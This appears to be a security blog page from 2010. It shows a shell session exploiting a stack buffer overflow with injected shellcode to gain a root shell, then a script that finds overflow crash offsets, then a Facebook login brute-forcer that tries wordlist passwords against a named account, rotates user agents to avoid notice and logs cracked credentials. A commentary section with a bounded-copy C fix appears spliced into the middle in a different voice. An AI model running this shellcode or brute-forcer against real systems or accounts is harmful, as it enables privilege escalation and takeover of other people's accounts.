Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18 strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
�Rh//shh/bin��RS��̀\���\���\���
Program completed normally!
Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) q
The program is running. Exit anyway? (y or n) y
root@localhost:/home/gunslinger/bof# q
bash: q: command not found
root@localhost:/home/gunslinger/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5" > shellcode3.bin
root@localhost:/home/gunslinger/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin)
root@localhost:/home/gunslinger/bof# getenv
bash: getenv: command not found
root@localhost:/home/gunslinger/bof# ./getenv
bash: ./getenv: No such file or directory
root@localhost:/home/gunslinger/bof# ls
bbf.py bof1 bof2.c bof.c bufferbruteforce.py displant.c easy.c get_env man-pages ron shellcode.bin smashme2 vanish.c
bf2.py bof1.c bof3 brute core easy2 expl get_env.c objdasm.vim ron.c shellcode.c smashme2.c
bof bof2 bof3.c brute.c displant easy2.c expl.c hts passwd.php shellcode3.bin smashme smashme.c
root@localhost:/home/gunslinger/bof# ./get_env
Segmentation fault
root@localhost:/home/gunslinger/bof# ./get_env PAYLOAD
PAYLOAD is at 0xbffffe78
root@localhost:/home/gunslinger/bof# printf "%x\n" $((0xbffffe78 + 100))
bffffedc
root@localhost:/home/gunslinger/bof# \xdc\xfe\xff\xbf
bash: xdcxfexffxbf: command not found
root@localhost:/home/gunslinger/bof# /bof2 $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
bash: /bof2: No such file or directory
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������
Program completed normally!
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2. "\xdc\xfe\xff\xbf" x 10')
String found where operator expected at -e line 1, near "2. "\xdc\xfe\xff\xbf""
(Missing operator before "\xdc\xfe\xff\xbf"?)
Number found where operator expected at -e line 1, near "x 10"
(Do you need to predeclare x?)
syntax error at -e line 1, near "2. "\xdc\xfe\xff\xbf""
Execution of -e aborted due to compilation errors.
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������
Program completed normally!
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 3 . "\xdc\xfe\xff\xbf" x 10')
The message was: �������������������������������������������
Program completed normally!
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 4 . "\xdc\xfe\xff\xbf" x 10')
The message was: ��������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 5 . "\xdc\xfe\xff\xbf" x 10')
The message was: ���������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 6 . "\xdc\xfe\xff\xbf" x 10')
The message was: ����������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 7 . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 8 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������������
Program completed normally!
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAMEOVER
GAMEOVER
# exit
root@localhost:/home/gunslinger/bof#
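The session above shows the whole chain that makes ron.c exploitable: an unbounded strcpy into a 40-byte stack buffer, no stack protector, and ASLR switched off. As an added example (not Ron Bowes's StackVuln.c and not the author's code), here is the same program with the copy bounded, plus a helper that states in bytes what the gdb runs above showed empirically: with the terminator counted, 40 'A's already write one byte past the buffer, which matches the 40-byte run printing "Program completed normally!" and then segfaulting.

```c
#include <stdio.h>
#include <string.h>

#define MSG_SIZE 40   /* same buffer size as ron.c's char string[40] */

/* Bounded replacement for ron.c's strcpy(string, argv[1]): copies src into
 * dst only if it fits together with its terminator. Returns 0 on success,
 * -1 (dst untouched) when the input would overflow. */
int copy_message(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_size)            /* n bytes plus the NUL must fit in dst_size */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Bytes an unbounded strcpy would write past a MSG_SIZE buffer for an input
 * of len bytes. The terminator counts: 40 'A's already write one byte past
 * the buffer, and 44 reach the first byte of the saved return address, which
 * is where the gdb runs above start faulting inside __libc_start_main. */
size_t overflow_bytes(size_t len)
{
    return len + 1 > MSG_SIZE ? len + 1 - MSG_SIZE : 0;
}

/* Would src be accepted by main() below? */
int message_fits(const char *src)
{
    char tmp[MSG_SIZE];
    return copy_message(tmp, sizeof tmp, src) == 0;
}

int main(int argc, char *argv[])
{
    char string[MSG_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (copy_message(string, sizeof string, argv[1]) != 0) {
        fprintf(stderr, "message too long: %zu bytes, max %d\n",
                strlen(argv[1]), MSG_SIZE - 1);
        return 1;
    }
    printf("The message was: %s\n", string);
    printf("Program completed normally!\n\n");
    return 0;
}
```

The fix is the length check, not the compiler flags: built with the same -fno-stack-protector and setuid root as in the session, this version rejects the 40-byte and longer inputs instead of reaching the saved frame pointer, so the offsets the session establishes (47 bytes leave eip at 0x00414141, 48 at 0x41414141) never come into play.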
bufferbruteforce.py
This is a buffer brute-forcer for testing buffer overflow programs.
#!/usr/bin/python
import sys, time, commands, os, os.path
'''
This is a buffer brute forcer program; it lets you brute force a buffer and find how many bytes it takes to get a Segmentation fault .
Written for educational purpose and pentest only. Use it at your own risk .
Toolname : bufferbruteforce.py
Author : gunslinger_ <yudha.gunslinger@gmail.com>
date : Sun Jul 4 00:58:54 WIT 2010
You can use this simple bof.c for testing .
-----------------bof.c-----------------
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
    char buffer[400];
    strcpy(buffer, argv[1]);
    return 0;
}
------------------EOF------------------
Example usage :
root@localhost:/home/gunslinger/bof# cat bof.c
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
    char buffer[400];
    strcpy(buffer, argv[1]);
    return 0;
}
root@localhost:/home/gunslinger/bof# echo 0 > /proc/sys/kernel/randomize_va_space
root@localhost:/home/gunslinger/bof# gcc -o bof -g -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
root@localhost:/home/gunslinger/bof# exit
gunslinger@localhost:~/bof$ ./bbf.py -a /home/gunslinger/bof/bof -s 1 -e 500
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
[*] Checking Existing application [Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' [Ok]
[*] Checking null on randomize_va_space [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 404 byte(s)
[!] Application got segmentation fault by giving 404 byte(s) into buffer !!
gunslinger@localhost:~/bof$
'''
'''define color'''
green = '\033[32m'   # was '\033[38m', which is not a colour code
red = '\033[31m'
reset = '\033[0;0m'
name = sys.argv[0]
fail = "[Failure]"
ok = "[Ok]"
rvs = '/proc/sys/kernel/randomize_va_space'
# the shell reports death by SIGSEGV as exit status 128+11 = 139; getstatusoutput()
# returns it shifted into the high byte, i.e. 35584
SEGV_STATUS = (128 + 11) << 8
face = '''
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>'''
option = '''
Usage: %s [options]
Options: -a, --application <path-to-application> | Target application for bruteforcing buffer
         -s, --start <int>                        | start byte for bruteforcing buffer
         -e, --end <int>                          | end byte for bruteforcing buffer
         -h, --help <help>                        | print this help
Example: %s -a /home/gunslinger/bufferoverflow/bof -s 0 -e 500
''' % (name, name)

def myface():
    print face

def helpMe():
    myface()
    print option
    sys.exit(1)

app = counter = end = None
for arg in sys.argv:
    if arg.lower() == '-a' or arg.lower() == '--application':
        app = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-s' or arg.lower() == '--start':
        # both bounds are converted to int here; as strings, "counter <= end"
        # compared text and the end bound was never honoured
        counter = int(sys.argv[int(sys.argv[1:].index(arg))+2])
    elif arg.lower() == '-e' or arg.lower() == '--end':
        end = int(sys.argv[int(sys.argv[1:].index(arg))+2])
    elif arg.lower() == '-h' or arg.lower() == '--help':
        helpMe()
    elif len(sys.argv) <= 1:
        helpMe()
if app is None or counter is None or end is None:
    helpMe()

def checkingexistingfile():
    if os.path.exists(app):
        exfile = green+ok
    else:
        exfile = red+fail
    time.sleep(1)
    print "\n[*] Checking Existing application \t\t\t\t\t%s%s" % (exfile, reset)
    if exfile == red+fail:
        print "[*] Please check your application target path"
        sys.exit(1)

def checkrandomize():
    if os.path.exists(rvs):
        exrvs = green+ok
    else:
        exrvs = red+fail
    time.sleep(1)
    print "[*] Checking \'/proc/sys/kernel/randomize_va_space\' \t\t\t%s%s" % (exrvs, reset)
    if exrvs == red+fail:
        sys.exit(1)
    # ASLR must be off for the crash length to be reproducible from run to run
    result = open(rvs).read().strip()
    time.sleep(1)
    if result == "0":
        print "[*] Checking null on randomize_va_space \t\t\t\t%s%s%s" % (green, ok, reset)
        time.sleep(1)
    else:
        print "[*] Checking null on randomize_va_space \t\t\t\t%s%s%s" % (red, fail, reset)
        print "[*] Please set randomize_va_space to 0: echo 0 > /proc/sys/kernel/randomize_va_space"
        sys.exit(1)

def checkperl():
    perl = "perl -e \'print \"A\" x 1\'"
    result = commands.getstatusoutput(perl)[1]
    if "A" in result:
        print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (green, ok, reset)
        time.sleep(1)
    else:
        print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (red, fail, reset)
        print "[*] Is perl installed on your system ?"
        sys.exit(1)

def bruteforcebuff():
    global counter
    print "[*] Preparing for bruteforcing buffer \t\t\t\t\t%s%s%s" % (green, ok, reset)
    time.sleep(1)
    while counter <= end:
        try:
            sys.stdout.write("\r[*] buffering on %s%d%s byte(s)" % (red, counter, reset))
            sys.stdout.flush()
            args = app+' '+'`perl -e \'print "A" x '+str(counter)+'\'`'
            status = commands.getstatusoutput(args)[0]
            if status == SEGV_STATUS:
                print "\n[!] Application got segmentation fault by giving %s%d%s byte(s) into buffer !!\n" % (red, counter, reset)
                break
            counter = counter + 1
        except KeyboardInterrupt:
            print "\n[-] Exiting %s" % (name)
            sys.exit(1)
    else:
        print "\n[-] No segmentation fault up to %d byte(s)" % (end)

def main():
    myface()
    checkingexistingfile()
    checkrandomize()
    checkperl()
    bruteforcebuff()

if __name__ == '__main__':
    main()





fbruteforcer.py
#!/usr/bin/python # This is facebook bruteforcer tools # This was written for educational purpose and pentest only. Use it at your own risk. # Author will not be responsible for any damage !! # Toolname : facebookbruteforcer.py # Programmer : Gunslinger_ <yudha.gunslinger@gmail.com> # Version : 1.0 # Date : Tue Jul 27 13:24:44 WIT 2010 # Special thanks to mywisdom to inspire me ;) import re import os import sys import random import warnings import time try: import mechanize except ImportError: print "[*] Please install mechanize python module first" sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) try: import cookielib except ImportError: print "[*] Please install cookielib python module first" sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning) # define variable __programmer__ = "gunslinger_ <yudha.gunslinger@gmail.com>" __version__ = "1.0" verbose = False useproxy = False usepassproxy = False log = 'fbbruteforcer.log' file = open(log, "a") success = 'http://www.facebook.com/?sk=messages&ref=mb' fblogin = 'https://login.facebook.com/login.php?login_attempt=1' # some cheating .. 
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Opera/8.00 (Windows NT 5.1; U; en)', 'amaya/9.51 libwww/5.4.0', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]' ] facebook = ''' __ _ _ / _| | | | | | |_ __ _ ___ ___| |__ ___ ___ | | __ | _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ / | || (_| | (_| __/ |_) | (_) | (_) | < |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\ bruteforcer... 
Programmer : %s Version : %s''' % (__programmer__, __version__) option = ''' Usage : %s [options] Option : -u, --username <username> | User for bruteforcing -w, --wordlist <filename> | Wordlist used for bruteforcing -v, --verbose | Set %s will be verbose -p, --proxy <host:port> | Set http proxy will be use -k, --usernameproxy <username> | Set username at proxy will be use -i, --passproxy <password> | Set password at proxy will be use -l, --log <filename> | Specify output filename (default : fbbruteforcer.log) -h, --help <help> | Print this help Example : %s -u brad@hackme.com -w wordlist.txt" P.S : add "&" to run in the background ''' % (sys.argv[0], sys.argv[0], sys.argv[0]) hme = ''' Usage : %s [option] -h or --help for get help ''' % sys.argv[0] def helpme(): print facebook print option file.write(facebook) file.write(option) sys.exit(1) def helpmee(): print facebook print hme file.write(facebook) file.write(hme) sys.exit(1) for arg in sys.argv: try: if arg.lower() == '-u' or arg.lower() == '--user': username = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-l' or arg.lower() == '--log': log = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-p' or arg.lower() == '--proxy': useproxy = True proxy = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-k' or arg.lower() == '--userproxy': usepassproxy = True usw = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-i' or arg.lower() == '--passproxy': usepassproxy = True usp = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-v' or arg.lower() == '--verbose': verbose = True elif arg.lower() == '-h' or arg.lower() == '--help': helpme() elif len(sys.argv) <= 1: helpmee() except IOError: helpme() except NameError: helpme() except IndexError: helpme() def bruteforce(word): try: sys.stdout.write("\r[*] Trying %s... 
" % word) file.write("[*] Trying %s\n" % word) sys.stdout.flush() br.addheaders = [('User-agent', random.choice(ouruseragent))] opensite = br.open(fblogin) br.select_form(nr=0) br.form['email'] = username br.form['pass'] = word br.submit() response = br.response().read() if verbose: print response if success in response: print "\n\n[*] Logging in success..." print "[*] Username : %s" % (username) print "[*] Password : %s\n" % (word) file.write("\n[*] Logging in success...") file.write("\n[*] Username : %s" % (username)) file.write("\n[*] Password : %s\n\n" % (word)) sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) except mechanize._mechanize.FormNotFoundError: print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n" file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n") sys.exit(1) except mechanize._form.ControlNotFoundError: print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n" file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n") sys.exit(1) def releaser(): global word for word in words: bruteforce(word.replace("\n","")) def main(): global br global words try: br = mechanize.Browser() cj = cookielib.LWPCookieJar() br.set_cookiejar(cj) br.set_handle_equiv(True) br.set_handle_gzip(True) br.set_handle_redirect(True) br.set_handle_referer(True) br.set_handle_robots(False) br.set_debug_http(False) br.set_debug_redirects(False) br.set_debug_redirects(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) if useproxy: br.set_proxies({"http": proxy}) if usepassproxy: br.add_proxy_password(usw, usp) if verbose: br.set_debug_http(True) br.set_debug_redirects(True) br.set_debug_redirects(True) except KeyboardInterrupt: print "\n[*] Exiting program...\n" file.write("\n[*] Exiting program...\n") sys.exit(1) try: preventstrokes = 
open(wordlist, "r") words = preventstrokes.readlines() count = 0 while count < len(words): words[count] = words[count].strip() count += 1 except IOError: print "\n[*] Error: Check your wordlist path\n" file.write("\n[*] Error: Check your wordlist path\n") sys.exit(1) except NameError: helpme() except KeyboardInterrupt: print "\n[*] Exiting program...\n" file.write("\n[*] Exiting program...\n") sys.exit(1) try: print facebook print "\n[*] Starting attack at %s" % time.strftime("%X") print "[*] Account for bruteforcing %s" % (username) print "[*] Loaded :",len(words),"words" print "[*] Bruteforcing, please wait..." file.write(facebook) file.write("\n[*] Starting attack at %s" % time.strftime("%X")) file.write("\n[*] Account for bruteforcing %s" % (username)) file.write("\n[*] Loaded : %d words" % int(len(words))) file.write("\n[*] Bruteforcing, please wait...\n") except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) try: releaser() bruteforce(word) except NameError: helpme() if __name__ == '__main__': main()
July 27, 2010 | Categories: Tools